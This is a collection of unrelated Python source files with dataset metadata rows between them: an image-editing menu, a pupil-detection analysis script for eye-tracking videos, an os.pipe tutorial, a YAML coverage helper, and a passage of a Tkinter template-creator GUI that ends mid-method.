umbral = float(input("Ingrese el umbral (valor entre 0 y 1):"))
print("Calculando imagen...")
image = visor_imagenes.binarizar_imagen(image, umbral)
visor_imagenes.visualizar_imagen(image)
return image
def ejecutar_convolucionar_imagen(image: list) -> list:
""" Aplica la convolución a la imagen recibida por parámetro.
Parámetros:
imagen (list) Matriz (M,N,3) con la imagen a convolucionar.
"""
print("Calculando imagen...")
image = visor_imagenes.convolucion_imagen(image)
visor_imagenes.visualizar_imagen(image)
return image
def ejecutar_convertir_negativo(image: list) -> list:
print("Calculando imagen...")
image = visor_imagenes.convertir_negativo(image)
visor_imagenes.visualizar_imagen(image)
return image
def ejecutar_reflejar_imagen(image: list) -> list:
print("Calculando imagen...")
image = visor_imagenes.reflejar_imagen(image)
visor_imagenes.visualizar_imagen(image)
return image
def ejecutar_convertir_a_grises(image: list) -> list:
print("Calculando imagen...")
image = visor_imagenes.convertir_a_grises(image)
visor_imagenes.visualizar_imagen(image)
return image
salir = False
image = None  # set by option 1; the loop guards the transformations until then
while not salir:
imprimir_menu_principal()
opcion = int(input("Ingrese la opción deseada: "))
    if opcion == 1:
        image = cargar_imagen()
    elif 2 <= opcion <= 6 and image is None:
        # The transformations below require an image loaded via option 1.
        print("Primero debe cargar una imagen (opción 1).")
elif opcion == 2:
image = ejecutar_convertir_negativo(image)
elif opcion == 3:
image = ejecutar_reflejar_imagen(image)
elif opcion == 4:
image = ejecutar_binarizar_imagen(image)
elif opcion == 5:
image = ejecutar_convertir_a_grises(image)
elif opcion == 6:
image = ejecutar_convolucionar_imagen(image)
elif opcion == 7:
salir = True
else:
print("El valor ingresado no es válido.")
| 29.2 | 97 | 0.665068 | 351 | 2,920 | 5.378917 | 0.293447 | 0.122352 | 0.095339 | 0.101695 | 0.424258 | 0.405191 | 0.363877 | 0.363877 | 0.337394 | 0.25053 | 0 | 0.008953 | 0.234932 | 2,920 | 99 | 98 | 29.494949 | 0.836168 | 0.180137 | 0 | 0.278689 | 0 | 0 | 0.164664 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114754 | false | 0 | 0.016393 | 0 | 0.229508 | 0.229508 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
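The visor_imagenes module is not shown, so purely as an illustration, here is what a simple grayscale convolution of the kind behind menu option (6) could look like: a 3x3 box blur with edge padding.

import numpy as np

def convolve_gray(image, kernel):
    kh, kw = kernel.shape
    ph, pw = kh // 2, kw // 2
    padded = np.pad(image, ((ph, ph), (pw, pw)), mode='edge')
    out = np.zeros(image.shape, dtype=float)
    for y in range(image.shape[0]):
        for x in range(image.shape[1]):
            out[y, x] = np.sum(padded[y:y + kh, x:x + kw] * kernel)
    return out

blur_kernel = np.ones((3, 3)) / 9.0  # averaging kernel; apply with convolve_gray(img, blur_kernel)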
a2fb354cbc108a6ea1f89565ec3de4f88cf84b32 | 22,630 | py | Python | PythonAnalysisScripts/preprocessing/Average_Clip_Per_Day_PupilDetection.py | everymind/SurprisingMinds-Analysis | eeb308043f471de3cdb505f82461cf8d6cf40e16 | [
"MIT"
] | null | null | null | PythonAnalysisScripts/preprocessing/Average_Clip_Per_Day_PupilDetection.py | everymind/SurprisingMinds-Analysis | eeb308043f471de3cdb505f82461cf8d6cf40e16 | [
"MIT"
] | 1 | 2020-11-20T03:38:36.000Z | 2020-11-20T03:38:36.000Z | PythonAnalysisScripts/preprocessing/Average_Clip_Per_Day_PupilDetection.py | everymind/SurprisingMinds-Analysis | eeb308043f471de3cdb505f82461cf8d6cf40e16 | [
"MIT"
] | 1 | 2020-11-19T23:52:46.000Z | 2020-11-19T23:52:46.000Z | import os
import glob
import cv2
import datetime
import numpy as np
import matplotlib.pyplot as plt
import zipfile
import shutil
import fnmatch
import sys
import math
import csv
### FUNCTIONS ###
def unpack_to_temp(path_to_zipped, path_to_temp):
try:
# copy zip file to current working directory
#print("Copying {folder} to current working directory...".format(folder=path_to_zipped))
current_working_directory = os.getcwd()
copied_zipped = shutil.copy2(path_to_zipped, current_working_directory)
path_to_copied_zipped = os.path.join(current_working_directory, copied_zipped.split(sep=os.sep)[-1])
# unzip the folder
#print("Unzipping files in {folder}...".format(folder=path_to_copied_zipped))
day_unzipped = zipfile.ZipFile(path_to_copied_zipped, mode="r")
# extract files into temp folder
day_unzipped.extractall(path_to_temp)
# close the unzipped file
day_unzipped.close()
#print("Finished unzipping {folder}!".format(folder=path_to_copied_zipped))
# destroy copied zipped file
#print("Deleting {file}...".format(file=path_to_copied_zipped))
os.remove(path_to_copied_zipped)
#print("Deleted {file}!".format(file=path_to_copied_zipped))
return True
except Exception:
print("Could not unzip {folder}".format(folder=path_to_zipped))
return False
def list_sub_folders(path_to_root_folder):
# List all sub folders
sub_folders = []
for folder in os.listdir(path_to_root_folder):
if(os.path.isdir(os.path.join(path_to_root_folder, folder))):
sub_folders.append(os.path.join(path_to_root_folder, folder))
return sub_folders
def find_target_frame(ref_timestamps_csv, target_timestamps_csv, ref_frame):
# Find the frame in one video that best matches the timestamp of ref frame from another video
# Get ref frame time
ref_timestamp = ref_timestamps_csv[ref_frame]
ref_timestamp = ref_timestamp.split('+')[0][:-1]
ref_time = datetime.datetime.strptime(ref_timestamp, "%Y-%m-%dT%H:%M:%S.%f")
# Generate delta times (w.r.t. start_frame) for every frame timestamp
frame_counter = 0
for timestamp in target_timestamps_csv:
timestamp = timestamp.split('+')[0][:-1]
time = datetime.datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%S.%f")
timedelta = ref_time - time
seconds_until_alignment = timedelta.total_seconds()
if(seconds_until_alignment < 0):
break
frame_counter = frame_counter + 1
return frame_counter
def find_darkest_circle(list_of_circles, source_image):
#print("Finding darkest circle in {list}...".format(list=list_of_circles))
# starting parameters
darkest_intensity = 255
darkest_index = 0
# check that source_image is a grayscaled image
if len(source_image.shape) > 2:
print("{Image} is not grayscale!".format(Image=source_image))
exit()
for i in range(len(list_of_circles)):
# make a copy of the source image
copied_image = source_image.copy()
# create a mask image that is the same size as source_image
mask = np.zeros(copied_image.shape, copied_image.dtype)
# get center coordinates and radius of circle from list_of_circle
center = (list_of_circles[i][0], list_of_circles[i][1])
radius = list_of_circles[i][2]
#print("Center: {x},{y}".format(x=center[0], y=center[1]))
# draw mask circle at coordinates and w/radius of circle from list_of_circles
mask_circle = cv2.circle(mask, center, radius, 255, -1)
## for debugging
# this_circle = cv2.circle(copied_image, center, radius, (0, 0, 255), 2)
# plt.imshow(copied_image)
# plt.show()
# get coordinates of mask circle pixels
where = np.where(mask==255)
# find those same coordinates in source_image
intensity_inside_circle_on_source_image = source_image[where[0], where[1]]
# take average of those pixels in source_image
average_intensity = np.average(intensity_inside_circle_on_source_image)
#print("Average intensity of circle {number}: {intensity}".format(number=i, intensity=average_intensity))
# check this circle's intensity against darkest circle found so far
if (average_intensity < darkest_intensity):
darkest_intensity = average_intensity
darkest_index = i
#print("Darkest circle: {number}, intensity {intensity}".format(number=darkest_index, intensity=darkest_intensity))
return list_of_circles[darkest_index]
def make_time_buckets(start_timestamp, bucket_size_ms, end_timestamp, fill_pattern):
start_timestamp = start_timestamp.split('+')[0][:-3]
end_timestamp = end_timestamp.split('+')[0][:-3]
buckets_start_time = datetime.datetime.strptime(start_timestamp, "%Y-%m-%dT%H:%M:%S.%f")
buckets_end_time = datetime.datetime.strptime(end_timestamp, "%Y-%m-%dT%H:%M:%S.%f")
current_bucket = buckets_start_time
time_buckets = []
window = datetime.timedelta(milliseconds=bucket_size_ms)
while current_bucket <= buckets_end_time:
time_buckets.append(current_bucket)
current_bucket = current_bucket + window
bucket_list = {key:fill_pattern.copy() for key in time_buckets}
# -5 remains in a time bucket, this means no 'near-enough timestamp' frame was found in video
return bucket_list
def find_nearest_timestamp_key(timestamp_to_check, dict_of_timestamps, time_window):
for key in dict_of_timestamps.keys():
if key <= timestamp_to_check <= (key + time_window):
return key
def find_pupil(which_eye, which_stimuli, trial_number, video_path, video_timestamps, align_frame, csv_path, bucket_size_ms):
    ### each saved row corresponds to a time bucket (timestamp), not a video frame ###
# Open eye video and world video
video = cv2.VideoCapture(video_path)
# Jump to specific frame (position) for alignment purposes
ret = video.set(cv2.CAP_PROP_POS_FRAMES, align_frame)
# Open display window for debugging
video_name = video_path.split(os.sep)[-1]
debug_name = "Eye"+"_"+video_name
cv2.namedWindow(debug_name)
# each time bucket = 4ms (eye cameras ran at 60fps, aka 16.6666 ms per frame)
    # octopus clip to thank you screen is 16.2 seconds
first_timestamp = video_timestamps[align_frame]
last_timestamp = video_timestamps[-1]
initialize_pattern = [-5,-5,-5,-5,-5,-5]
pupil_buckets = make_time_buckets(first_timestamp, bucket_size_ms, last_timestamp, initialize_pattern)
# Loop through 4ms time buckets of eye video to find nearest frame and save pupil xy positon and area
timestamps_to_check = video_timestamps[align_frame:]
for timestamp in timestamps_to_check:
# find the time bucket into which this frame falls
timestamp = timestamp.split('+')[0][:-3]
timestamp_dt = datetime.datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%S.%f")
bucket_window = datetime.timedelta(milliseconds=bucket_size_ms)
current_key = find_nearest_timestamp_key(timestamp_dt, pupil_buckets, bucket_window)
# Read frame at current position
ret, frame = video.read()
mask = np.copy(frame)
# Make sure the frame exists!
if frame is not None:
# Magically find pupil...
# Convert to grayscale
gray = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
# Median blur
blurred = cv2.medianBlur(gray, 25)
# Hough circle detection
rows = blurred.shape[0]
## sometimes the image seems really clean and easy to find the pupil and yet it still fails
circles = cv2.HoughCircles(blurred, cv2.HOUGH_GRADIENT, 1.0, rows / 9.0,
param1=55, param2=20,
minRadius=10, maxRadius=150)
# If there are no circles, then what??
if circles is not None:
#print("Circles found: {circles}".format(circles=circles))
# check that we are taking the darkest circle
darkest_circle = find_darkest_circle(circles[0], blurred)
#print("Darkest circle: {circle}".format(circle=darkest_circle))
# Using the best circle...crop around center
# Threshold
# Fit an ellipse
# Crop
eye_circle = np.uint16(np.around(darkest_circle))
left = eye_circle[0] - 64
top = eye_circle[1] - 64
crop_size = 128
# Check boundarys of image
if( (left >= 0) and (top >= 0) and ((left + crop_size) < 800) and ((top + crop_size) < 600) ):
cropped = blurred[top:(top + crop_size), left:(left+crop_size)]
# Compute average and stdev of all pixel luminances along border
## this currently averages the rightmost and leftmost edges of the cropped window, because we assume that these pixels are not the pupil
avg = (np.mean(cropped[:, 0]) + np.mean(cropped[:, -1])) / 2
std = (np.std(cropped[:, 0]) + np.std(cropped[:, -1])) / 2
## Find shape of pupil
# Threshold
thresholded = np.uint8(cv2.threshold(cropped, avg-(std*4.5), 255, cv2.THRESH_BINARY_INV)[1])
# Find contours
                contours, hierarchy = cv2.findContours(thresholded, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
# if more than one contour
if len(contours) > 0:
# Get largest contour
largest_contour = max(contours, key=cv2.contourArea)
# sanity check size of largest contour
## SHOULD MAKE SURE THAT LARGEST CONTOUR ISN'T BIGGER THAN CROPPED
#####
# make sure contour is large enough to fit an ellipse to it
if(len(largest_contour) > 5):
# Fit ellipse to largest contour
ellipse = cv2.fitEllipse(largest_contour)
# Shift ellipse back to full frame coordinates
shifted_center = (np.int(ellipse[0][0]) + left, np.int(ellipse[0][1]) + top)
# Draw circles
frame_copy = frame.copy()
circles = np.uint16(np.around(circles))
for i in circles[0, :]:
center = (i[0], i[1])
# circle center
cv2.circle(frame_copy, center, 5, (0, 100, 100), 1)
# circle outline
radius = i[2]
cv2.circle(frame_copy, center, radius, (255, 0, 255), 1)
# Draw ellipse around largest contour
axes = (int(ellipse[1][0]/2), int(ellipse[1][1]/2))
angle = int(ellipse[2])
frame_copy = cv2.ellipse(frame_copy, shifted_center, axes, angle, 0, 360, (0, 255, 0), 3, cv2.LINE_AA, 0)
# Draw debugging circle around darkest circle
axes = (darkest_circle[2], darkest_circle[2])
angle = 0
frame_copy = cv2.ellipse(frame_copy, (darkest_circle[0], darkest_circle[1]), axes, angle, 0, 360, (0, 0, 255), 2, cv2.LINE_AA, 0)
# Save Data
darkest_circle_area = np.pi*(darkest_circle[2])**2
# save data from both findContours and find_darkest_circle
pupil_buckets[current_key][0] = shifted_center[0]
pupil_buckets[current_key][1] = shifted_center[1]
pupil_buckets[current_key][2] = cv2.contourArea(largest_contour)
pupil_buckets[current_key][3] = darkest_circle[0]
pupil_buckets[current_key][4] = darkest_circle[1]
pupil_buckets[current_key][5] = darkest_circle_area
# Fill debug displays and show
cv2.imshow(debug_name, frame_copy)
ret = cv2.waitKey(1)
else:
#print("Pupil Size: n/a (too small)")
pupil_buckets[current_key][2] = -1
pupil_buckets[current_key][5] = -1
else:
#print("Pupil Size: n/a (pupil off screen)")
pupil_buckets[current_key][2] = -2
pupil_buckets[current_key][5] = -2
else:
#print("Pupil Size: n/a (no contour)")
pupil_buckets[current_key][2] = -3
pupil_buckets[current_key][5] = -3
else:
#print("Pupil Size: n/a (no circles)")
pupil_buckets[current_key][2] = -4
pupil_buckets[current_key][5] = -4
# Save pupil size data
time_chunks = []
for key in pupil_buckets.keys():
time_chunks.append(key)
time_chunks = sorted(time_chunks)
pupils = []
for time in time_chunks:
pupil = pupil_buckets[time]
pupils.append(pupil)
#print("Saving csv of positions and areas for {eye} eye...".format(eye=which_eye))
padded_filename = which_eye + "_" + which_stimuli + "_" + str(trial_number).zfill(4) + ".csv"
csv_file = os.path.join(csv_path, padded_filename)
np.savetxt(csv_file, pupils, fmt='%.2f', delimiter=',')
# release video capture
video.release()
cv2.destroyAllWindows()
def save_average_clip_images(which_eye, no_of_seconds, save_folder_path, images):
# Save images from trial clip to folder
#print("Saving averaged frames from {eye}...".format(eye=which_eye))
for f in range(no_of_seconds):
# Create file name with padded zeros
padded_filename = which_eye + str(f).zfill(4) + ".png"
# Create image file path from save folder
image_file_path = os.path.join(save_folder_path, padded_filename)
# Extract gray frame from clip
gray = np.uint8(images[:,:,f] * 255)
# Write to image file
ret = cv2.imwrite(image_file_path, gray)
### -------------------------------------------- ###
### LET THE ANALYSIS BEGIN!! ###
### log everything in a text file
current_working_directory = os.getcwd()
class Logger(object):
def __init__(self):
# grab today's date
now = datetime.datetime.now()
log_filename = "PupilDetection_log_" + now.strftime("%Y-%m-%d_%H-%M-%S") + ".txt"
log_file = os.path.join(current_working_directory, log_filename)
self.terminal = sys.stdout
self.log = open(log_file, "a")
def write(self, message):
self.terminal.write(message)
self.log.write(message)
def flush(self):
#this flush method is needed for python 3 compatibility.
#this handles the flush command by doing nothing.
#you might want to specify some extra behavior here.
pass
sys.stdout = Logger()
### ------------------------------------------- ###
# list all folders in Synology drive
# on lab computer
data_drive = r"\\Diskstation\SurprisingMinds"
### FOR DEBUGGING ON LAPTOP ###
#data_drive = r'C:\Users\taunsquared\Desktop\SM_temp'
# get the subfolders, sort their names
data_folders = sorted(os.listdir(data_drive))
zipped_data = fnmatch.filter(data_folders, '*.zip')
zipped_names = [item[:-4] for item in zipped_data]
# skip first day because it was an exhibit debugging day
zipped_data = zipped_data[1:]
# figure out which days have already been analysed
# when working from local drive, lab computer
analysed_drive = r"C:\Users\Kampff_Lab\Dropbox\SurprisingMinds\analysis\dataPythonWorkflows"
# when working from laptop
#analysed_drive = r"C:\Users\taunsquared\Dropbox\SurprisingMinds\analysis\dataPythonWorkflows"
analysed_folders = sorted(os.listdir(analysed_drive))
already_analysed = [item for item in zipped_names if item in analysed_folders]
# unzip each folder, do the analysis
for item in zipped_data:
# check to see if this folder has already been analyzed
if item[:-4] in already_analysed:
print("Folder {name} has already been analysed".format(name=item))
continue
# if this folder hasn't already been analysed, full speed ahead!
print("Working on folder {name}".format(name=item))
this_day_date = item[:-4].split('_')[1]
# grab a folder
day_zipped = os.path.join(data_drive, item)
# Build relative analysis paths in a folder with same name as zip folder
analysis_folder = os.path.join(analysed_drive, item[:-4], "Analysis")
# Analysis subfolders
csv_folder = os.path.join(analysis_folder, "csv")
alignment_folder = os.path.join(analysis_folder, "alignment")
# Create the analysis folder and its sub-folders if they do not exist
if not os.path.exists(analysis_folder):
#print("Creating analysis folder.")
os.makedirs(analysis_folder)
if not os.path.exists(csv_folder):
#print("Creating csv folder.")
os.makedirs(csv_folder)
if not os.path.exists(alignment_folder):
#print("Creating alignment folder.")
os.makedirs(alignment_folder)
# create a temp folder in current working directory to store data (contents of unzipped folder)
day_folder = os.path.join(current_working_directory, "temp")
# unzip the current zipped folder into the temp folder; unpack_to_temp()
# returns True if the folder unzips successfully and False otherwise
if unpack_to_temp(day_zipped, day_folder):
# List all trial folders
trial_folders = list_sub_folders(day_folder)
num_trials = len(trial_folders)
current_trial = 0
stim_vids = [24.0, 25.0, 26.0, 27.0, 28.0, 29.0]
stim_name_to_float = {"stimuli024": 24.0, "stimuli025": 25.0, "stimuli026": 26.0, "stimuli027": 27.0, "stimuli028": 28.0, "stimuli029": 29.0}
stim_float_to_name = {24.0: "stimuli024", 25.0: "stimuli025", 26.0: "stimuli026", 27.0: "stimuli027", 28.0: "stimuli028", 29.0: "stimuli029"}
for trial_folder in trial_folders:
# add exception handling so that a weird day doesn't totally break everything
try:
trial_name = trial_folder.split(os.sep)[-1]
# Load CSVs and create timestamps
# ------------------------------
# Get world movie timestamp csv path
world_csv_path = glob.glob(trial_folder + '/*world.csv')[0]
stimuli_name = world_csv_path.split("_")[-2]
stimuli_number = stim_name_to_float[stimuli_name]
# at what time resolution to build eye and world camera data?
bucket_size = 4 #milliseconds
# Load world CSV
world_timestamps = np.genfromtxt(world_csv_path, dtype=str, delimiter=' ')
# Get eye timestamp csv paths
right_eye_csv_path = glob.glob(trial_folder + '/*righteye.csv')[0]
left_eye_csv_path = glob.glob(trial_folder + '/*lefteye.csv')[0]
# Load eye CSVs
right_eye_timestamps = np.genfromtxt(right_eye_csv_path, dtype=str, delimiter=' ')
left_eye_timestamps = np.genfromtxt(left_eye_csv_path, dtype=str, delimiter=' ')
# Get world video filepath
world_video_path = glob.glob(trial_folder + '/*world.avi')[0]
# Open world video
world_video = cv2.VideoCapture(world_video_path)
### NOW WE ARE FINDING PUPILS FOR THE WHOLE STIMULI SEQUENCE ###
# Show the frame to check where we are starting pupil finding (ground truth)
fig_name = trial_name + ".png"
fig_path = os.path.join(alignment_folder, fig_name)
ret, frame = world_video.read()
plt.imshow(frame)
plt.savefig(fig_path)
plt.show(block=False)
plt.pause(1)
plt.close()
# ------------------------------
world_video.release()
# ------------------------------
# ------------------------------
# Now start pupil detection
# ------------------------------
# Get right eye video filepath
right_video_path = glob.glob(trial_folder + '/*righteye.avi')[0]
# Get left eye video filepath
left_video_path = glob.glob(trial_folder + '/*lefteye.avi')[0]
# Find right eye pupils and save pupil data
print("Finding right eye pupils...")
find_pupil("right", stimuli_name, current_trial, right_video_path, right_eye_timestamps, 0, csv_folder, bucket_size)
# Find left eye pupils and save pupil data
print("Finding left eye pupils...")
find_pupil("left", stimuli_name, current_trial, left_video_path, left_eye_timestamps, 0, csv_folder, bucket_size)
# Report progress
cv2.destroyAllWindows()
print("Finished Trial: {trial}".format(trial=current_trial))
current_trial = current_trial + 1
except Exception:
cv2.destroyAllWindows()
print("Trial {trial} failed!".format(trial=current_trial))
current_trial = current_trial + 1
# report progress
world_video.release()
cv2.destroyAllWindows()
print("Finished {day}".format(day=day_zipped[:-4]))
# delete temporary file with unzipped data contents
print("Deleting temp folder of unzipped data...")
shutil.rmtree(day_folder)
print("Delete successful!")
#FIN
print("Completed analysis on all data folders in this drive!")
# close logfile
sys.stdout.close() | 50.066372 | 157 | 0.605833 | 2,818 | 22,630 | 4.67885 | 0.188077 | 0.020705 | 0.020174 | 0.02336 | 0.170876 | 0.119075 | 0.070155 | 0.027835 | 0.0135 | 0.006219 | 0 | 0.022375 | 0.287053 | 22,630 | 452 | 158 | 50.066372 | 0.794843 | 0.279629 | 0 | 0.067416 | 0 | 0 | 0.053207 | 0.006271 | 0.003745 | 0 | 0 | 0 | 0 | 1 | 0.041199 | false | 0.003745 | 0.044944 | 0 | 0.116105 | 0.044944 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2fd2a455b0fa197bf807b50d91f470950216cf8 | 946 | py | Python | tutorial_orchestrator.py | liordon/motion_detector | 7c22062bb3a8b254d9e4a3d6d88a89d89320785a | [
"Unlicense"
] | null | null | null | tutorial_orchestrator.py | liordon/motion_detector | 7c22062bb3a8b254d9e4a3d6d88a89d89320785a | [
"Unlicense"
] | null | null | null | tutorial_orchestrator.py | liordon/motion_detector | 7c22062bb3a8b254d9e4a3d6d88a89d89320785a | [
"Unlicense"
] | null | null | null | # Python program to explain os.pipe() method
# importing os module
import os
# Create a pipe
r, w = os.pipe()
# The returned file descriptor r and w
# can be used for reading and
# writing respectively.
# We will create a child process
# and using these file descriptor
# the parent process will write
# some text and child process will
# read the text written by the parent process
# Create a child process
pid = os.fork()
# pid greater than 0 represents
# the parent process
if pid > 0:
# This is the parent process
# Closes file descriptor r
os.close(r)
# Write some text to file descriptor w
print("Parent process is writing")
text = b"Hello child process"
os.write(w, text)
print("Written text:", text.decode())
else:
# This is the child process
# Closes file descriptor w
os.close(w)
# Read the text written by parent process
print("\nChild Process is reading")
r = os.fdopen(r)
print("Read text:", r.read())
| 19.306122 | 45 | 0.713531 | 154 | 946 | 4.383117 | 0.37013 | 0.134815 | 0.118519 | 0.056296 | 0.183704 | 0.124444 | 0.124444 | 0.124444 | 0 | 0 | 0 | 0.002649 | 0.201903 | 946 | 48 | 46 | 19.708333 | 0.891391 | 0.61945 | 0 | 0 | 0 | 0 | 0.275148 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.071429 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2fe0379026d2d4ae1ca0a364d794c57d26a8a7e | 1,816 | py | Python | evaluation/classify_lib.py | uwplse/staccato | aad14e2ef37ad73dda9e1dffd9b5889b4b959125 | [
"MIT"
] | 1 | 2017-02-21T07:10:35.000Z | 2017-02-21T07:10:35.000Z | evaluation/classify_lib.py | uwplse/staccato | aad14e2ef37ad73dda9e1dffd9b5889b4b959125 | [
"MIT"
] | null | null | null | evaluation/classify_lib.py | uwplse/staccato | aad14e2ef37ad73dda9e1dffd9b5889b4b959125 | [
"MIT"
] | null | null | null | import yaml
import sys
expand = {
"$$StaccatoGroup-1": ["mail.smtp.username","mail.smtp.password"],
"$$StaccatoGroup-0": ["LocaleLanguage","LocaleCountry","LocaleVariant"]
}
def compute_stats(untested, checked, option_spec):
"""Count properties per category and compute the coverage percentage."""
checked = set(checked) & set(option_spec["all_props"])
nums = {
"checked": len(checked),
"updated": len(option_spec["updated"]),
"immutable": len(option_spec["immutable"]),
"internal": len(option_spec["internal"]),
"untested": len(untested),
"other": len(option_spec["other"]),
"total": len(option_spec["all_props"])
}
num = len(checked) + len(option_spec["updated"])
coverage = (num * 100) / float(num + len(untested) + len(option_spec['internal']))
nums["coverage"] = coverage
return nums
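# Worked example of the coverage formula above (hypothetical counts): with 10
# checked, 5 updated, 3 untested and 2 internal properties,
# coverage = (10 + 5) * 100 / (10 + 5 + 3 + 2) = 75.0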
def parse_checked(prop_file):
"""Load the checked-properties YAML, expanding grouped keys via `expand`."""
check = None
with open(prop_file, 'r') as f:
check = yaml.safe_load(f)
for k1 in list(check.iterkeys()):
values = set(check[k1])
for (k,v) in expand.iteritems():
if k in values:
values.remove(k)
values |= set(v)
check[k1] = list(values)
checked_props = set(check["con"]) | set(check["strict"])
tested_props = set(check["write"])
return tested_props & checked_props
def parse(option_file, prop_file):
"""Combine the option spec with the checked properties and return coverage stats."""
option_spec = None
with open(option_file, 'r') as f:
option_spec = yaml.safe_load(f)
checked_props = parse_checked(prop_file)
candidate_props = set(option_spec["all_props"]) - (set(option_spec["immutable"]) | set(option_spec["updated"]) | set(option_spec["internal"]) | set(option_spec["other"]))
checked_props = checked_props & candidate_props
untested = candidate_props - checked_props
return compute_stats(untested, checked_props, option_spec)
| 37.061224 | 174 | 0.636564 | 224 | 1,816 | 4.973214 | 0.28125 | 0.152603 | 0.081688 | 0.048474 | 0.037702 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005579 | 0.210352 | 1,816 | 48 | 175 | 37.833333 | 0.771269 | 0 | 0 | 0 | 0 | 0 | 0.155837 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068182 | false | 0.022727 | 0.045455 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c004a9dc65a2f46fbd46a5fc35d9ba037bc9ac6 | 4,975 | py | Python | TemplateCreator.py | thomas-schweich/WIZ | d279003c0eb7e9bd7037f493a6fea758a19d5d96 | [
"MIT"
] | null | null | null | TemplateCreator.py | thomas-schweich/WIZ | d279003c0eb7e9bd7037f493a6fea758a19d5d96 | [
"MIT"
] | null | null | null | TemplateCreator.py | thomas-schweich/WIZ | d279003c0eb7e9bd7037f493a6fea758a19d5d96 | [
"MIT"
] | null | null | null | import Tkinter as Tk
import tkFileDialog
from ExpressionChain import ExpressionChain
import pickle
class TemplateCreator(Tk.Toplevel):
__author__ = "Thomas Schweich"
def __init__(self, *args, **kwargs):
Tk.Toplevel.__init__(self, *args, **kwargs)
Tk.Label(self, text="Create A Template").pack()
self.instructionsFrame = Tk.Frame(self)
self.instructionsFrame.pack(side=Tk.TOP)
self.instructionsShown = True
self.instructions = \
Tk.Label(self.instructionsFrame, justify=Tk.LEFT,
text="* Each line you create below is evaluated as a user written expression.\n"
"* Lines which evaluate to graphs will be plotted to the screen when the template is loaded."
"\n* A graph containing the data you load using the template can be referenced by "
"typing '<ORIGINAL>' with no quotes.\n"
"* Expressions down the line can access names defined above them, but not below them. "
"Thus, operations can be chained.")
self.instructions.pack(side=Tk.TOP)
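# Example template lines, a sketch of the syntax described in the instructions
# above (`.slice(...)` is a hypothetical graph operation, used purely for
# illustration):
#   Name: Graph 1    Expression: <ORIGINAL>
#   Name: Trimmed    Expression: <Graph 1>.slice(0, 1000)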
self.hidebutton = Tk.Label(self.instructionsFrame, text="Hide", fg="blue")
self.hidebutton.bind("<Button-1>", self.showHide)
self.hidebutton.pack(side=Tk.BOTTOM)
self.baseframe = Tk.Frame(self)
self.baseframe.pack(fill=Tk.BOTH, side=Tk.TOP)
# Convenience functions for creating a label that says "Name: " or "Expression: "
self.nameLabel = lambda frame: Tk.Label(frame, text="Name: ")
self.expLabel = lambda frame: Tk.Label(frame, text="Expression: ")
# Create buttons in separate frame which stays on the bottom of the window
self.buttonFrame = Tk.Frame(self)
self.buttonFrame.pack(side=Tk.BOTTOM)
self.addButton = Tk.Button(self.buttonFrame, text="Add Expression", command=self.addExp)
self.addButton.pack(side=Tk.LEFT)
self.saveButton = Tk.Button(self.buttonFrame, text="Save Template", command=self.save)
self.saveButton.pack(side=Tk.RIGHT)
self.dropdownFrame = Tk.Frame(self)
self.dropdownFrame.pack(side=Tk.BOTTOM)
self.dropdownVar = Tk.StringVar(self)
self.dropdownVar.set("ORIGINAL")
self.dropdown = Tk.OptionMenu(self.dropdownFrame, self.dropdownVar, "ORIGINAL")
self.dropdown.pack(side=Tk.LEFT)
self.addDropButton = Tk.Button(self.dropdownFrame, text="Insert", command=self.insert)
self.addDropButton.pack(side=Tk.RIGHT)
self.frames = []
self.names = []
self.nameVars = []
self.expressions = []
# Create first set of entries manually
self.addExp()
self.names[0].insert(0, "Graph 1")
self.expressions[0].insert(0, "<ORIGINAL>")
self.error = Tk.Label(self.baseframe, text="Invalid selection", fg="red")
def showHide(self, _):
if self.instructionsShown:
self.instructions.pack_forget()
self.hidebutton.configure(text="Show")
self.instructionsShown = False
else:
self.instructions.pack()
self.hidebutton.configure(text="Hide")
self.instructionsShown = True
def insert(self):
try:
self.focus_get().insert(Tk.INSERT, "<%s>" % self.dropdownVar.get())
except TypeError:
pass # No Entry selected
def addExp(self):
"""Creates new labels and entries, adding the entries to their respective lists for later usage"""
newFrame = Tk.Frame(self.baseframe)
newFrame.pack(side=Tk.TOP, fill=Tk.X)
nameLabel = self.nameLabel(newFrame)
nameLabel.pack(side=Tk.LEFT)
nameVar = Tk.StringVar(self)
nameVar.trace('w', self.updateOptions)
self.nameVars.append(nameVar)
name = Tk.Entry(newFrame, textvariable=nameVar)
name.pack(side=Tk.LEFT)
expLabel = self.expLabel(newFrame)
expLabel.pack(side=Tk.LEFT)
exp = Tk.Entry(newFrame, width=100)
exp.pack(side=Tk.LEFT, fill=Tk.X)
self.frames.append(newFrame)
self.names.append(name)
self.expressions.append(exp)
def updateOptions(self, *args):
self.dropdown.destroy()
